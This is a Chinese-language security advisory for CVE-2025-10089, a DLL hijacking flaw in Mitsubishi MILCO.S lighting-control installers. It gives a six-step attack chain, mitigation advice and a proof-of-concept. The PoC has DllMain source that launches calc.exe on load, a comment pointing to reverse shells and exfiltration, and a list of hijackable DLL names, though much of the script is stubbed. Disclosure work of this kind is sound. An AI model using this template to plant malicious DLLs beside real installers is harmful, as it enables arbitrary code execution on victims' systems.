CVE-2025-10089: 三菱MILCO.S照明控制应用DLL劫持漏洞

漏洞信息

漏洞编号

CVE-2025-10089

漏洞类型

不受控制的搜索路径元素(DLL劫持)

CVSS评分

7.7 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MILCO.S Setting Application, MILCO.S Setting Application (IR), MILCO.S Easy Setting Application (IR), MILCO.S Easy Switch Application (IR)

漏洞概述

CVE-2025-10089是三菱电机照明控制系统应用中的一个高危安全漏洞，CVSS评分7.7。该漏洞存在于MILCO.S系列设置应用程序中，属于不受控制的搜索路径元素漏洞（即DLL劫持漏洞）。攻击者可以通过诱导用户运行恶意构造的安装程序，使应用程序在安装过程中加载攻击者预先放置的恶意DLL文件，从而在受害者系统上执行任意恶意代码。由于该漏洞仅影响安装程序运行阶段，安装完成后不受影响。如果用户直接从三菱电机官方网站下载并安装受影响产品，则不存在引入恶意代码的风险。漏洞发现者为Mitsubishi Electric PSIRT团队，披露日期为2025年11月18日。

技术细节

该漏洞的根本原因在于应用程序在加载动态链接库(DLL)时未使用安全路径指定，而是依赖系统PATH环境变量或当前工作目录进行DLL搜索。攻击者可以在与安装程序相同目录或系统搜索路径中的某个位置放置同名恶意DLL文件。当安装程序运行时，Windows会先搜索攻击者控制的目录，加载恶意DLL而非合法的系统DLL。恶意DLL被加载后，其导出函数（如DllMain、_DllMainCRTStartup）会自动执行，攻击者可在其中实现任意恶意操作，如：建立后门连接、窃取敏感信息、执行远程代码或安装持久化恶意软件。值得注意的是，如果应用程序的'属性-数字签名'标签中显示签名者为'Mitsubishi Electric Lighting'，则表示该版本已修复此问题。攻击者通常需要结合社会工程学手段，诱导用户从非官方渠道或通过钓鱼方式获取恶意修改的安装包。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者收集目标软件信息，识别存在DLL搜索路径漏洞的安装程序版本

STEP 2

步骤2: 恶意DLL制作

攻击者编写恶意动态链接库，包含后门代码或远程控制功能，用于替换合法DLL

STEP 3

步骤3: 构造攻击载体

攻击者将恶意DLL与原始安装程序打包，或通过供应链攻击替换官方安装包

STEP 4

步骤4: 社会工程

攻击者通过钓鱼邮件、恶意网站等渠道诱导用户下载并运行修改后的安装程序

STEP 5

步骤5: DLL加载执行

当用户运行安装程序时，由于不安全的DLL搜索路径，恶意DLL被优先加载并执行

STEP 6

步骤6: 恶意代码执行

恶意DLL中的代码以当前用户权限执行，可进行数据窃取、建立持久化后门等操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10089 DLL Hijacking PoC
# Target: MILCO.S Setting Application Installer
# Vulnerability: Uncontrolled Search Path Element (DLL Hijacking)

import os
import ctypes
from ctypes import wintypes

# Create malicious DLL source code
dll_source = '''
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Malicious code execution on DLL load
        WinExec("calc.exe", SW_SHOWNORMAL);  // Example: Launch calculator
        // In real attack: reverse shell, data exfiltration, etc.
        MessageBox(NULL, "DLL Hijacking Successful - CVE-2025-10089", "PoC", MB_OK);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
'''

# Common DLL names that may be hijacked
target_dlls = [
    "version.dll",
    "winhttp.dll",
    "secur32.dll",
    "iertutil.dll",
    "urlmon.dll",
    "imagehlp.dll"
]

def create_malicious_dll(dll_name, output_path):
    """Generate malicious DLL file"""
    dll_path = os.path.join(output_path, dll_name)
    # In real PoC: compile DLL or use precompiled DLL
    print(f"[*] Creating malicious DLL: {dll_path}")
    # Simulated DLL creation
    return dll_path

def setup_attack_environment(installer_path, dll_name):
    """Prepare attack environment by placing malicious DLL alongside installer"""
    installer_dir = os.path.dirname(installer_path)
    malicious_dll = os.path.join(installer_dir, dll_name)
    
    print(f"[*] Placing {dll_name} in: {installer_dir}")
    print(f"[*] When installer runs, it will load our malicious DLL")
    print(f"[*] Social engineering needed to get victim to run modified installer")
    
    return malicious_dll

def check_if_vulnerable():
    """Check if application is vulnerable by examining digital signature"""
    print("[*] Checking for 'Mitsubishi Electric Lighting' digital signature...")
    print("[*] If signed by 'Mitsubishi Electric Lighting' = PATCHED")
    print("[*] If not signed or different signer = VULNERABLE")

if __name__ == "__main__":
    print("=== CVE-2025-10089 DLL Hijacking PoC ===")
    print("Target: MILCO.S Lighting Control Application Installers")
    print("Attack Vector: Local (installer execution)")
    print("Note: This is for educational purposes only")
    
    check_if_vulnerable()

影响范围

MILCO.S Setting Application (所有版本)

MILCO.S Setting Application (IR) (所有版本)

MILCO.S Easy Setting Application (IR) (所有版本)

MILCO.S Easy Switch Application (IR) (所有版本)

防御指南

临时缓解措施

该漏洞仅在安装程序运行阶段产生影响，安装完成后不受影响。用户应仅从三菱电机官方网站下载软件，并验证安装程序具有'Mitsubishi Electric Lighting'数字签名。临时缓解措施包括：在运行安装程序前使用杀毒软件进行全面扫描；检查安装包哈希值是否与官方公布的一致；使用应用白名单功能阻止未知程序执行；考虑在沙箱环境中运行安装程序以隔离潜在风险。